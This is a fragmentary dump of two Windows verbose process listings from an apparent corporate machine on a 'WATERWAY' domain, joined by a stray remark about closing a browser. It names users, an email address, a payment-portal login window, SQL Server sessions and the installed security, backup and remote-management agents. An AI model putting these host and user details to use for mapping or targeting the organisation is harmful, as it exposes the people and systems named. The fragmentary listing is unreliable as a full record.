AUTHORITY\SYSTEM 0:00:01 N/A powershell.exe 9392 Services 0 8,312 K Unknown NT AUTHORITY\SYSTEM 0:00:06 N/A ALEService.exe 6424 Services 0 278,392 K Unknown WATERWAY\Administrator 25:54:25 N/A SgrmBroker.exe 9920 Services 0 6,524 K Unknown NT AUTHORITY\SYSTEM 0:00:24 N/A SolarWinds.MSP.PME.Agent. 
10480 Services 0 6,140 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A AgentMaint.exe 8472 Services 0 12,552 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A NableAVDBridge.exe 1080 Services 0 20,836 K Unknown NT AUTHORITY\SYSTEM 0:00:12 N/A conhost.exe 3952 Services 0 8,588 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A svchost.exe 12600 Services 0 6,264 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 5348 Services 0 8,256 K Unknown NT AUTHORITY\SYSTEM 0:00:28 N/A svchost.exe 13084 Services 0 14,636 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A WmiPrvSE.exe 11176 Services 0 18,112 K Unknown NT AUTHORITY\SYSTEM 0:12:50 N/A svchost.exe 12772 Services 0 12,884 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A EPConsole.exe 10036 Console 1 980 K Running WATERWAY\mharper 0:01:24 DeviceScanInvisibleDialog sihost.exe 8052 Console 1 26,364 K Running WATERWAY\mharper 0:00:59 N/A svchost.exe 13196 Console 1 34,052 K Unknown WATERWAY\mharper 0:02:50 N/A svchost.exe 5636 Console 1 28,584 K Running WATERWAY\mharper 0:00:15 N/A Windows Push Notifications Platform svchost.exe 3496 Services 0 20,100 K Unknown NT AUTHORITY\SYSTEM 0:02:27 N/A svchost.exe 12876 Services 0 5,884 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A explorer.exe 7964 Console 1 161,740 K Running WATERWAY\mharper 0:09:58 N/A svchost.exe 12656 Console 1 23,688 K Running WATERWAY\mharper 0:00:11 N/A StartMenuExperienceHost.e 12852 Console 1 71,244 K Running WATERWAY\mharper 0:00:06 Start RuntimeBroker.exe 11180 Console 1 10,820 K Unknown WATERWAY\mharper 0:00:01 N/A PowerToys.exe 3224 Console 1 16,996 K Running WATERWAY\mharper 0:02:35 N/A SearchUI.exe 1740 Console 1 191,720 K Running WATERWAY\mharper 0:01:01 N/A RuntimeBroker.exe 9124 Console 1 33,680 K Running WATERWAY\mharper 0:00:18 N/A SecurityHealthSystray.exe 13596 Console 1 8,472 K Running WATERWAY\mharper 0:00:07 N/A SecurityHealthService.exe 13616 Services 0 12,748 K Unknown NT AUTHORITY\SYSTEM 0:01:14 N/A svchost.exe 14072 Services 0 9,028 K Unknown NT AUTHORITY\SYSTEM 
0:00:00 N/A SetPoint.exe 1872 Console 1 10,252 K Running WATERWAY\mharper 0:00:07 N/A KHALMNPR.exe 13780 Console 1 9,236 K Running WATERWAY\mharper 0:00:16 KHALHIDC_MainWindow RtkAudUService64.exe 14060 Console 1 6,916 K Running WATERWAY\mharper 0:00:00 RealtekAudioBackgroundProcessClass svchost.exe 8320 Services 0 7,180 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A RuntimeBroker.exe 14364 Console 1 19,484 K Unknown WATERWAY\mharper 0:00:45 N/A LogiOptions.exe 14388 Console 1 9,392 K Running WATERWAY\mharper 0:01:37 LOGI_RAWINPUT_WND LogiOptionsMgr.exe 14516 Console 1 29,380 K Running WATERWAY\mharper 0:09:59 LDEVICEMGR_WINDOW_{49DCDDA1-BF03-46BC-B469-59A0616325A2} LogiOverlay.exe 14528 Console 1 61,356 K Running WATERWAY\mharper 0:00:44 WISPTIS StreamDeck.exe 14624 Console 1 47,372 K Running WATERWAY\mharper 2:09:20 NVOpenGLPbuffer OneDrive.exe 14836 Console 1 38,668 K Running WATERWAY\mharper 0:00:27 DDE Server Window flux.exe 15676 Console 1 19,472 K Running WATERWAY\mharper 0:00:39 f.lux: Softer during the day, Warm before bed CCleaner64.exe 15592 Console 1 45,016 K Running WATERWAY\mharper 0:01:12 N/A GlassWire.exe 15532 Console 1 65,324 K Running WATERWAY\mharper 0:02:22 GlassWire svchost.exe 15548 Services 0 16,388 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A QtWebEngineProcess.exe 15568 Console 1 8,100 K Unknown WATERWAY\mharper 0:00:00 N/A svchost.exe 16508 Services 0 6,152 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:00 N/A com.barraider.spotify.exe 16832 Console 1 10,068 K Unknown WATERWAY\mharper 0:00:10 N/A conhost.exe 18784 Console 1 4,088 K Unknown WATERWAY\mharper 0:00:00 N/A com.barraider.streamcount 18836 Console 1 37,360 K Running WATERWAY\mharper 0:24:35 .NET-BroadcastEventWindow.4.0.0.0.37a9c05.0 QtWebEngineProcess.exe 18844 Console 1 12,188 K Unknown WATERWAY\mharper 0:00:00 N/A conhost.exe 18856 Console 1 4,104 K Unknown WATERWAY\mharper 0:00:00 N/A cpu.exe 18984 Console 1 4,780 K Unknown WATERWAY\mharper 0:00:25 N/A conhost.exe 18992 Console 1 4,100 K 
Unknown WATERWAY\mharper 0:00:00 N/A com.nicollasr.streamdeckv 19016 Console 1 14,940 K Running WATERWAY\mharper 0:00:07 OleMainThreadWndName conhost.exe 19048 Console 1 3,984 K Unknown WATERWAY\mharper 0:00:00 N/A twitchstudiostreamdeck.ex 19056 Console 1 3,624 K Unknown WATERWAY\mharper 0:00:00 N/A conhost.exe 19072 Console 1 3,988 K Unknown WATERWAY\mharper 0:00:00 N/A ColorPicker.exe 20096 Console 1 9,928 K Running WATERWAY\mharper 0:00:05 MediaContextNotificationWindow PowerLauncher.exe 20412 Console 1 131,324 K Running WATERWAY\mharper 0:02:46 Hidden Window CCXProcess.exe 19820 Console 1 2,372 K Unknown WATERWAY\mharper 0:00:00 N/A node.exe 19840 Console 1 13,504 K Unknown WATERWAY\mharper 0:00:21 N/A conhost.exe 19876 Console 1 4,084 K Unknown WATERWAY\mharper 0:00:00 N/A Screenpresso.exe 19996 Console 1 25,832 K Running WATERWAY\mharper 0:00:11 N/A AdobeIPCBroker.exe 20912 Console 1 6,108 K Running WATERWAY\mharper 0:00:02 N/A NCentralRRDLdr.exe 14720 Console 1 7,892 K Running WATERWAY\mharper 0:00:06 N/A 3CXWin8Phone.exe 21632 Console 1 123,544 K Running WATERWAY\mharper 0:44:55 3CX - 3592 Mark Harper BASupSrvcCnfg.exe 21872 Console 1 12,808 K Running WATERWAY\mharper 0:11:53 IncomingVoIPCallTrayForm acrotray.exe 13696 Console 1 16,756 K Running WATERWAY\mharper 0:00:00 AcrobatTrayIcon WScheduler.exe 23000 Console 1 5,364 K Running WATERWAY\mharper 0:01:44 WScheduler SDTray.exe 23544 Console 1 17,668 K Running WATERWAY\mharper 0:01:15 Spybot - Search & Destroy 2 ShellExperienceHost.exe 17392 Console 1 56,400 K Running WATERWAY\mharper 0:00:12 New notification RuntimeBroker.exe 20748 Console 1 19,832 K Running WATERWAY\mharper 0:00:00 N/A GWIdlMon.exe 25244 Console 1 7,004 K Running WATERWAY\mharper 0:00:16 GlassWireIdleMonitorWn conhost.exe 25252 Console 1 3,992 K Unknown WATERWAY\mharper 0:00:00 N/A svchost.exe 25592 Console 1 13,172 K Unknown WATERWAY\mharper 0:00:00 N/A WinStore.App.exe 7836 Console 1 688 K Running WATERWAY\mharper 0:00:01 N/A 
ApplicationFrameHost.exe 25828 Console 1 23,108 K Running WATERWAY\mharper 0:00:02 Calculator RuntimeBroker.exe 24008 Console 1 14,084 K Running WATERWAY\mharper 0:00:01 OleMainThreadWndName AcrobatNotificationClient 25972 Console 1 6,372 K Running WATERWAY\mharper 0:00:00 N/A AdobeNotificationClient.e 25996 Console 1 14,900 K Running WATERWAY\mharper 0:00:00 N/A AcrobatNotificationClient 26052 Console 1 6,404 K Running WATERWAY\mharper 0:00:00 N/A RuntimeBroker.exe 16240 Console 1 14,568 K Unknown WATERWAY\mharper 0:00:00 N/A RuntimeBroker.exe 25876 Console 1 14,396 K Unknown WATERWAY\mharper 0:00:00 N/A RuntimeBroker.exe 25888 Console 1 11,688 K Unknown WATERWAY\mharper 0:00:00 N/A CompPkgSrv.exe 23576 Console 1 6,024 K Unknown WATERWAY\mharper 0:00:00 N/A SystemSettings.exe 22688 Console 1 644 K Running WATERWAY\mharper 0:00:00:00 Settings svchost.exe 21296 Services 0 5,900 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A taskhostw.exe 26116 Console 1 15,672 K Running WATERWAY\mharper 0:00:00 Task Host Window WindowsInternal.composabl 27044 Console 1 41,168 K Running WATERWAY\mharper 0:00:14 Microsoft Text Input Application rundll32.exe 26128 Console 1 5,896 K Running WATERWAY\mharper 0:00:00 OleMainThreadWndName svchost.exe 25704 Services 0 4,896 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A notepad.exe 2892 Console 1 10,996 K Running WATERWAY\mharper 0:00:08 *Untitled - Notepad SettingSyncHost.exe 15248 Console 1 5,636 K Running WATERWAY\mharper 0:00:00 N/A svchost.exe 23560 Console 1 4,408 K Unknown WATERWAY\mharper 0:00:00 N/A svchost.exe 6036 Services 0 5,840 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:30 N/A NCentralRDViewer.exe 2440 Console 1 16,612 K Running WATERWAY\mharper 0:01:03 SolarWinds Take Control svchost.exe 17712 Services 0 8,284 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A SystemSettingsBroker.exe 10444 Console 1 8,000 K Unknown WATERWAY\mharper 0:00:00 N/A Microsoft.Photos.exe 29200 Console 1 68,756 K Running WATERWAY\mharper 0:00:41 OleMainThreadWndName 
RuntimeBroker.exe 28796 Console 1 28,488 K Running WATERWAY\mharper 0:00:57 N/A Calculator.exe 21148 Console 1 500 K Running WATERWAY\mharper 0:00:00 Calculator Video.UI.exe 30660 Console 1 12,768 K Running WATERWAY\mharper 0:00:00 N/A RuntimeBroker.exe 24116 Console 1 7,544 K Unknown WATERWAY\mharper 0:00:00 N/A ctfmon.exe 26676 Console 1 17,252 K Running WATERWAY\mharper 0:00:11 N/A MailStoreHome.exe 8108 Console 1 432,560 K Running WATERWAY\mharper 7:17:28 Progress View Ssms.exe 19396 Console 1,297,696 K Running WATERWAY\mharper 0:58:09 SQLQuery2.sql - Unit 43.Gilbarco (sa (60))* - Microsoft SQL Server Manag unsecapp.exe 31732 Console 1 13,220 K Running WATERWAY\mharper 0:01:05 OleMainThreadWndName firefox.exe 5428 Console 1 429,628 K Running WATERWAY\mharper 0:03:14 Authorize.NET - Login - Merchant Interface - Mozilla Firefox firefox.exe 25284 Console 1 83,832 K Running WATERWAY\mharper 0:00:03 N/A firefox.exe 27856 Console 1 71,808 K Running WATERWAY\mharper 0:00:01 OleMainThreadWndName firefox.exe 9332 Console 1 423,712 K Running WATERWAY\mharper 0:08:55 OleMainThreadWndName nplastpass.exe 16856 Console 1 9,912 K Not Responding WATERWAY\mharper 0:00:00 OleMainThreadWndName conhost.exe 20348 Console 1 6,384 K Unknown WATERWAY\mharper 0:00:00 N/A firefox.exe 23236 Console 1 130,108 K Running WATERWAY\mharper 0:00:05 OleMainThreadWndName firefox.exe 24704 Console 1 144,296 K Running WATERWAY\mharper 0:00:13 OleMainThreadWndName firefox.exe 6720 Console 1 40,112 K Not Responding WATERWAY\mharper 0:00:01 OleMainThreadWndName firefox.exe 2592 Console 1 34,500 K Not Responding WATERWAY\mharper 0:00:00 OleMainThreadWndName YourPhone.exe 19940 Console 1 28,036 K Running WATERWAY\mharper 0:00:00 N/A RuntimeBroker.exe 21212 Console 1 11,620 K Unknown WATERWAY\mharper 0:00:00 N/A taskhostw.exe 22120 Console 1 19,008 K Running WATERWAY\mharper 0:00:00 Task Host Window mstsc.exe 28548 Console 1 15,928 K Unknown NT AUTHORITY\SYSTEM 0:00:06 N/A OfficeClickToRun.exe 25400 
Services 0 72,136 K Unknown NT AUTHORITY\SYSTEM 0:00:17 N/A AppVShNotify.exe 18780 Services 0 8,668 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A AppVShNotify.exe 7548 Console 1 9,424 K Unknown WATERWAY\mharper 0:00:00 N/A SearchIndexer.exe 16388 Services 0 171,936 K Unknown NT AUTHORITY\SYSTEM 0:01:30 N/A UserInterface.exe 22152 Console 1 34,048 K Running WATERWAY\mharper 0:00:00 Email Change Request - v2.0.0.12 mstsc.exe 18104 Console 1 8,880 K Unknown WATERWAY\mharper 0:00:15 N/A WmiPrvSE.exe 20708 Services 0 14,132 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A svchost.exe 18532 Services 0 7,532 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 25384 Services 0 21,744 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A TabTip.exe 8460 Console 1 17,892 K Running WATERWAY\mharper 0:00:00 G svchost.exe 22944 Services 0 9,132 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A OUTLOOK.EXE 31768 Console 1 286,900 K Running WATERWAY\mharper 0:00:49 Orders - mharper@waterway.com - Outlook SearchProtocolHost.exe 26768 Console 1 8,984 K Running WATERWAY\mharper 0:00:50 HardwareMonitorWindow powershell.exe 23332 Services 0 74,120 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A conhost.exe 26448 Services 0 12,088 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A powershell.exe 30680 Services 0 58,904 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A conhost.exe 25292 Services 0 11,508 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A SearchFilterHost.exe 17528 Services 0 28,072 K Unknown NT AUTHORITY\SYSTEM 0:00:13 N/A svchost.exe 27460 Services 0 13,416 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A SDUpdate.exe 15416 Services 0 20,268 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 29440 Services 0 8,720 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A cmd.exe 27000 Console 1 6,088 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A conhost.exe 13852 Console 1 13,148 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A tasklist.exe 18052 Console 1 11,924 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A ``was just now''. 
chrome.exe 53128 Console 4 89,820 K Unknown WATERWAY\blauer 0:00:07 N/A chrome.exe 50200 Console 4 86,080 K Unknown WATERWAY\blauer 0:00:01 N/A chrome.exe 55936 Console 4 167,528 K Unknown WATERWAY\blauer 0:00:06 N/A Chrome isn't on the process sheet, I'll close my browser for 24 hours. Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title ========================= ======== ================ =========== ============ =============== ================================================== ============ ======================================================================== System Idle Process 0 Services 0 8 K Unknown NT AUTHORITY\SYSTEM 4076:03:56 N/A System 4 Services 0 2,260 K Unknown N/A 55:26:16 N/A Secure System 88 Services 0 40,516 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A Registry 152 Services 0 88,892 K Unknown NT AUTHORITY\SYSTEM 0:00:32 N/A smss.exe 712 Services 0 1,004 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A csrss.exe 1104 Services 0 3,312 K Unknown NT AUTHORITY\SYSTEM 0:02:42 N/A wininit.exe 1204 Services 0 3,740 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A services.exe 1280 Services 0 14,816 K Unknown NT AUTHORITY\SYSTEM 2:25:58 N/A LsaIso.exe 1300 Services 0 2,456 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A lsass.exe 1308 Services 0 28,232 K Unknown NT AUTHORITY\SYSTEM 1:13:13 N/A svchost.exe 1424 Services 0 2,904 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 1448 Services 0 48,528 K Unknown NT AUTHORITY\SYSTEM 0:18:52 N/A fontdrvhost.exe 1476 Services 0 1,960 K Unknown Font Driver Host\UMFD-0 0:00:17 N/A WUDFHost.exe 1540 Services 0 3,672 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A svchost.exe 1580 Services 0 25,648 K Unknown NT AUTHORITY/NETWORK SERVICE 0:18:06 N/A svchost.exe 1672 Services 0 7,448 K Unknown NT AUTHORITY\SYSTEM 0:02:10 N/A svchost.exe 1928 Services 0 14,368 K Unknown NT AUTHORITY/NETWORK SERVICE 0:37:14 N/A svchost.exe 1964 Services 0 5,024 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:46 N/A 
svchost.exe 1972 Services 0 4,984 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A svchost.exe 1984 Services 0 4,800 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:08 N/A svchost.exe 1992 Services 0 11,448 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:29 N/A svchost.exe 2016 Services 0 4,908 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:03 N/A svchost.exe 2024 Services 0 4,976 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:04 N/A svchost.exe 796 Services 0 3,372 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 2092 Services 0 5,964 K Unknown NT AUTHORITY/LOCAL SERVICE 0:01:41 N/A svchost.exe 2140 Services 0 6,812 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A svchost.exe 2148 Services 0 6,972 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:09 N/A svchost.exe 2156 Services 0 8,616 K Unknown NT AUTHORITY/NETWORK SERVICE 0:16:36 N/A svchost.exe 2288 Services 0 58,236 K Unknown NT AUTHORITY\LOCAL SERVICE 0:04:33 N/A svchost.exe 2380 Services 0 3,564 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 2520 Services 0 39,696 K Unknown NT AUTHORITY/LOCAL SERVICE 0:01:48 N/A svchost.exe 2640 Services 0 11,220 K Unknown NT AUTHORITY/NETWORK SERVICE 0:01:25 N/A svchost.exe 2668 Services 0 8,840 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A svchost.exe 2856 Services 0 9,548 K Unknown NT AUTHORITY\LOCAL SERVICE 0:02:47 N/A NVDisplay.Container.exe 2876 Services 0 7,592 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A svchost.exe 2932 Services 0 12,412 K Unknown NT AUTHORITY\SYSTEM 0:01:10 N/A svchost.exe 2952 Services 0 7,604 K Unknown NT AUTHORITY\SYSTEM 0:00:31 N/A svchost.exe 3032 Services 0 6,944 K Unknown NT AUTHORITY\SYSTEM 0:00:14 N/A svchost.exe 3068 Services 0 8,116 K Unknown NT AUTHORITY\SYSTEM 0:35:17 N/A svchost.exe 2208 Services 0 5,476 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:03 N/A svchost.exe 2076 Services 0 3,752 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A svchost.exe 3188 Services 0 5,924 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A Memory Compression 3220 Services 0 913,128 K Unknown NT 
AUTHORITY\SYSTEM 4:11:03 N/A svchost.exe 3260 Services 0 6,420 K Unknown NT AUTHORITY\SYSTEM 0:00:15 N/A dasHost.exe 3288 Services 0 13,892 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:07 N/A svchost.exe 3320 Services 0 27,668 K Unknown NT AUTHORITY\SYSTEM 1:18:04 N/A svchost.exe 3328 Services 0 5,784 K Unknown NT AUTHORITY\SYSTEM 0:02:09 N/A svchost.exe 3336 Services 0 8,928 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:14 N/A svchost.exe 3412 Services 0 6,660 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:21 N/A svchost.exe 3632 Services 0 4,808 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A svchost.exe 3660 Services 0 7,512 K Unknown NT AUTHORITY\SYSTEM 0:00:28 N/A svchost.exe 3688 Services 0 9,432 K Unknown NT AUTHORITY\SYSTEM 0:00:08 N/A svchost.exe 3816 Services 0 17,668 K Unknown NT AUTHORITY\SYSTEM 0:05:11 N/A svchost.exe 3868 Services 0 14,044 K Unknown NT AUTHORITY\SYSTEM 0:00:20 N/A svchost.exe 4040 Services 0 5,172 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 3400 Services 0 4,964 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:11 N/A svchost.exe 4112 Services 0 5,604 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 4392 Services 0 11,808 K Unknown NT AUTHORITY\LOCAL SERVICE 0:04:22 N/A svchost.exe 4508 Services 0 6,556 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:04 N/A svchost.exe 4516 Services 0 4,268 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:05 N/A svchost.exe 4560 Services 0 4,440 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 4664 Services 0 6,656 K Unknown NT AUTHORITY\SYSTEM 0:00:57 N/A svchost.exe 4712 Services 0 5,716 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:06 N/A spoolsv.exe 4796 Services 0 29,976 K Unknown NT AUTHORITY\SYSTEM 0:02:06 N/A svchost.exe 5568 Services 0 4,864 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 5584 Services 0 11,352 K Unknown NT AUTHORITY/NETWORK SERVICE 0:01:01 N/A svchost.exe 5592 Services 0 30,584 K Unknown NT AUTHORITY\SYSTEM 0:05:15 N/A svchost.exe 5600 Services 0 4,160 K Unknown NT AUTHORITY\LOCAL 
SERVICE 0:00:04 N/A BASupSrvcUpdater.exe 5608 Services 0 11,564 K Unknown NT AUTHORITY\SYSTEM 0:06:10 N/A BASupSrvc.exe 5616 Services 0 24,980 K Unknown NT AUTHORITY\SYSTEM 0:18:30 N/A svchost.exe 5560 Services 0 3,372 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A bdredline.exe 5628 Services 0 7,808 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A BtwRSupportService.exe 5636 Services 0 4,160 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 5644 Services 0 5,040 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A EPIntegrationService.exe 5660 Services 0 13,624 K Unknown NT AUTHORITY\SYSTEM 0:06:34 N/A EPUpdateService.exe 5668 Services 0 9,536 K Unknown NT AUTHORITY\SYSTEM 0:03:42 N/A 3CXWMRemoteControlSvc.exe 5676 Services 0 3,492 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A armsvc.exe 5688 Services 0 4,076 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A EPProtectedService.exe 5696 Services 0 6,148 K Unknown NT AUTHORITY\SYSTEM 0:01:18 N/A svchost.exe 5716 Services 0 46,712 K Unknown NT AUTHORITY\LOCAL SERVICE 0:16:32 N/A AGSService.exe 5724 Services 0 6,508 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A AGMService.exe 5736 Services 0 7,496 K Unknown NT AUTHORITY\SYSTEM 0:00:08 N/A AdobeUpdateService.exe 5760 Services 0 4,300 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A EPSecurityService.exe 5784 Services 0 206,880 K Unknown NT AUTHORITY\SYSTEM 4:22:41 N/A MTSCRA.WEBAPI.HostService 5800 Services 0 4,284 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A svchost.exe 5836 Services 0 5,964 K Unknown NT AUTHORITY\SYSTEM 0:09:33 N/A sqlservr.exe 6000 Services 0 265,128 K Unknown NT AUTHORITY\SYSTEM 6:41:36 N/A svchost.exe 6036 Services 0 3,308 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A svchost.exe 6064 Services 0 3,356 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A svchost.exe 6124 Services 0 3,220 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A RedGate.Client.Service.ex 6236 Services 0 16,064 K Unknown NT AUTHORITY\SYSTEM 0:00:23 N/A RtkAudUService64.exe 6244 Services 0 5,260 K Unknown NT 
AUTHORITY\SYSTEM 0:00:14 N/A svchost.exe 6256 Services 0 3,404 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A sqlbrowser.exe 6264 Services 0 1,864 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A svchost.exe 6272 Services 0 7,764 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:13 N/A sqlwriter.exe 6280 Services 0 4,248 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A mysqld.exe 6316 Services 0 4,372 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:01 N/A vss-service-x64.exe 6448 Services 0 3,920 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A svchost.exe 6528 Services 0 6,996 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A svchost.exe 6540 Services 0 16,048 K Unknown NT AUTHORITY\SYSTEM 0:00:27 N/A vmms.exe 6548 Services 0 14,092 K Unknown NT AUTHORITY\SYSTEM 0:00:18 N/A VeeamFilesysVssSvc.exe 6608 Services 0 7,660 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 6616 Services 0 3,348 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A agent.exe 6632 Services 0 422,776 K Unknown NT AUTHORITY\SYSTEM 0:30:15 N/A Veeam.Backup.Agent.Config 6648 Services 0 13,388 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A wgsslvpnsrc.exe 6664 Services 0 2,472 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A VeeamHvIntegrationSvc.exe 6700 Services 0 6,912 K Unknown NT AUTHORITY\SYSTEM 0:21:15 N/A VeeamTransportSvc.exe 6744 Services 0 4,232 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 6772 Services 0 4,932 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:14 N/A VeeamDeploymentSvc.exe 6780 Services 0 7,888 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A VeeamNFSSvc.exe 6800 Services 0 2,916 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A CptService.exe 6900 Services 0 2,648 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 7380 Services 0 8,080 K Unknown NT AUTHORITY\SYSTEM 0:00:14 N/A sqlceip.exe 7728 Services 0 42,668 K Unknown NT SERVICE\SQLTELEMETRY$VEEAMSQL2016 0:00:57 N/A sqlservr.exe 7744 Services 0 129,812 K Unknown NT SERVICE\MSSQL$MSSQLSERVER01 11:15:43 N/A sqlceip.exe 7752 Services 0 25,080 K Unknown NT 
SERVICE\SQLTELEMETRY$MSSQLSERVER01 0:00:36 N/A WmiPrvSE.exe 8048 Services 0 74,680 K Unknown NT AUTHORITY\SYSTEM 1:16:17 N/A Veeam.Guest.Interaction.P 8224 Services 0 2,684 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A conhost.exe 8296 Services 0 3,216 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A mysqld.exe 8432 Services 0 22,736 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:04 N/A conhost.exe 8496 Services 0 3,296 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A unsecapp.exe 8740 Services 0 4,644 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A dasHost.exe 8776 Services 0 5,012 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:00 N/A MsDtsSrvr.exe 8300 Services 0 5,424 K Unknown NT SERVICE\MsDtsServer150 0:00:02 N/A sqlceip.exe 8928 Services 0 15,660 K Unknown NT SERVICE\SSISTELEMETRY150 0:00:56 N/A sqlceip.exe 9352 Services 0 21,304 K Unknown NT SERVICE\SQLTELEMETRY 0:01:21 N/A svchost.exe 10072 Services 0 14,716 K Unknown NT AUTHORITY\SYSTEM 0:00:11 N/A svchost.exe 10156 Services 0 5,272 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:47 N/A svchost.exe 10224 Services 0 4,792 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A vmcompute.exe 9444 Services 0 3,676 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A vds.exe 9520 Services 0 4,772 K Unknown NT AUTHORITY\SYSTEM 0:00:22 N/A svchost.exe 10676 Services 0 8,248 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 10740 Services 0 5,244 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A NableSixtyFourBitManager. 
